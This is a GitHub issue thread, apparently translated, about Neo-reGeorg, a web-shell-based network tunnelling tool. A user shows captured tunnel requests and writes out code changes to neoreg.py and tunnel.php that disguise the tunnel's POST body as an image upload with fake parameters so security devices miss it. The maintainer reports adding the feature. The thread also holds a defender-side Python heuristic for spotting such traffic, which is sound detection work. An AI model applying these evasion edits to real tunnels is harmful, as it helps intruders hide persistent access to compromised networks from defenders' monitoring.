L-codes / Neo-reGeorg

Neo-reGeorg is a project that seeks to aggressively refactor reGeorg
GNU General Public License v3.0

Request: add a POST disguise feature #84

Closed ddwpwop closed 1 year ago

ddwpwop commented 1 year ago

Packet capture shows that the current request looks like this:

POST /tunnel.php HTTP/1.1
Host: 127.0.0.1:89
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=vhecp7urk9qhrhja3v8gilvci2;
Content-type: application/octet-stream
Content-Length: 819

...

A packet like this is easily classified as malicious traffic, because Godzilla's requests look similar. So I suggest adding disguised POST request parameters, for example:

POST /tunnel.php HTTP/1.1
Host: 127.0.0.1:89
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=vhecp7urk9qhrhja3v8gilvci2;
Content-type: application/octet-stream
Content-Length: 819

img=data:image/png;base64,...&id=23914214&kid=acd8dea3f212313&time=1188271471

This mainly requires simple changes to neoreg.py at lines 417 and 604:

417 data = 'img=data:image/png;base64,'+encode_body(info)+'&id=23914214&kid=acd8dea3f212313&time=1188271471'

604 data = 'img=data:image/png;base64,'+encode_body(info)+'&id=23914214&kid=acd8dea3f212313&time=1188271471'

And in tunnel.php at line 119, add:

$post_data = str_replace('img=data:image/png;base64,', '', $post_data);
$post_data = str_replace('&id=23914214&kid=acd8dea3f212313&time=1188271471', '', $post_data);

After these changes the packet looks like a normal POST request. But my abilities are limited: I can only make simple changes to the PHP tunnel.php and don't know how to modify the .NET and Java ones. I hope the author can consider adding a customization feature, something like sqlmap's prefix and suffix options, to disguise the POST input with custom strings.
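From the defender's side, the two captures above give enough structure to write a detection heuristic. The following is an added example, not code from the Neo-reGeorg project or from this thread: it parses constructed POST requests modelled on the captures (the bodies are placeholders, not real tunnel payloads) and flags the signals a network sensor could key on: a form-encoded body declared as application/octet-stream, an opaque binary body posted to a script endpoint, and an id/kid/time triple that never changes between requests.

```python
from urllib.parse import parse_qs


def make_request(path, ctype, body):
    """Build a raw HTTP/1.1 POST with the header set seen in the issue's capture (constructed sample)."""
    return (f"POST {path} HTTP/1.1\r\nHost: 127.0.0.1:89\r\n"
            f"Content-type: {ctype}\r\nContent-Length: {len(body)}\r\n\r\n{body}")


def parse_request(raw):
    """Split a raw request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {k.strip().lower(): v.strip() for k, v in (h.split(":", 1) for h in header_lines)}
    return request_line, headers, body


def tunnel_indicators(raw, seen_triples):
    """Return the detection reasons for one request.

    seen_triples accumulates (id, kid, time) values across requests so that a
    'time' parameter that never changes stands out from a real client's."""
    request_line, headers, body = parse_request(raw)
    path = request_line.split(" ")[1]
    octet = headers.get("content-type", "").lower().startswith("application/octet-stream")
    # Only treat a printable body containing '=' as a form; binary bodies stay opaque.
    form = parse_qs(body, keep_blank_values=True) if body.isprintable() and "=" in body else {}
    reasons = []
    if octet and form:
        reasons.append("form-encoded body declared as application/octet-stream")
    if octet and not form and path.endswith(".php"):
        reasons.append("opaque binary body posted to a script endpoint")
    triple = tuple(form.get(k, [""])[0] for k in ("id", "kid", "time"))
    if all(triple):
        seen_triples[triple] = seen_triples.get(triple, 0) + 1
        if seen_triples[triple] > 1:
            reasons.append("identical id/kid/time triple repeated across requests (static 'time')")
    return reasons


def scan(requests):
    """Run the heuristic over a request stream, sharing the triple counter across it."""
    seen = {}
    return [tunnel_indicators(r, seen) for r in requests]


# Constructed samples: the plain tunnel request, the disguised one sent twice, and a benign upload.
DISGUISED_BODY = "img=data:image/png;base64,iVBORw0KGgo=&id=23914214&kid=acd8dea3f212313&time=1188271471"
SAMPLES = [
    make_request("/tunnel.php", "application/octet-stream", "\x00\x01\x02BINARYTUNNEL\x7f"),
    make_request("/tunnel.php", "application/octet-stream", DISGUISED_BODY),
    make_request("/tunnel.php", "application/octet-stream", DISGUISED_BODY),
    make_request("/upload.php", "application/x-www-form-urlencoded",
                 "img=data:image/png;base64,iVBORw0KGgo=&id=1&time=1700000000"),
]
```

The third signal only fires on the second disguised request, which is why the stream is scanned as a whole rather than request by request.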

L-codes commented 1 year ago

Indeed, there is currently no request disguise, only response disguise. I'll consider adding it when I have time. Since so far no device has been found that flags the encoded body, may I ask which device classified the packet as malicious traffic?

ddwpwop commented 1 year ago

A certain vendor's situational-awareness device; it alerts on any communication at all.

L-codes commented 1 year ago

A certain vendor's situational-awareness device; it alerts on any communication at all.

That would mean far too many false positives...

L-codes commented 1 year ago

This requested feature has been added in version 5.1.0 :)